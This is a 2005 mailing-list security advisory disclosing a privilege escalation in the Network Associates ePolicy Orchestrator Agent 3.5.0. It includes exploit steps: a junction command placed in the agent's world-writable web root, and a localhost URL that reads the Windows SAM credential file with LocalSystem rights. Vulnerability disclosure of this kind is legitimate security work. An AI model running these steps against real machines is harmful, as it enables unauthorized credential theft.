Date: Thu, 11 Aug 2005 09:30:46 -0700
From: Reed Arvin <reedarvin@gmail.com.>
To: vuln@secunia.com, news@securiteam.com, bugtraq@securityfocus.com,
Subject: Privilege escalation in Network Associates ePolicy Orchestrator Agent 3.5.0 (patch 3)
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
X-Virus-Scanned: antivirus-gw at tyumen.ru
Summary:
Privilege escalation in Network Associates ePolicy Orchestrator Agent
3.5.0 (patch 3) (http://www.nai.com/)
Details:
The ePolicy Orchestrator Agent web server (which runs on TCP port 8081
by default and serves the McAfee Agent Activity Log) can be used to
view files that exist on the same partition with LocalSystem level
privileges. On a default windows installation the "C:\Documents and
Settings\All Users\Application Data\Network Associates\Common
Framework\Db" folder (which is created by the EPO agent and is the
folder that serves as the web root for the McAfee Agent Activity Log)
includes the NTFS permission Everyone/Full Control. By using the
Junction tool (from SysInternals) available at
http://www.sysinternals.com/utilities/junction.html one can create a
subfolder in the EPO agent web root directory (as any user) that will
allow any file on the same partition to be viewed with LocalSystem
level privileges.
Vulnerable Versions:
Network Associates ePolicy Orchestrator Agent 3.5.0 (patch 3)
Patches/Workarounds:
The vendor was notified of the issue. There was no response.
Exploits:
1. Logon to a machine running the EPO agent as any user.
2. Using the Juction tool type the following command:
junction "C:\Documents and Settings\All Users\Application Data\Network
Associates\Common Framework\Db\Test" C:\
This creates the equivalent of a virtual folder in the web server root n=
amed
Test that points to C:\
3. Use Internet Explorer to view a restricted file such as:
http://127.0.0.1:8081/Test/WINDOWS/repair/sam
The contents of the restricted file will be displayed thanks to the
LocalSystem account.
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)
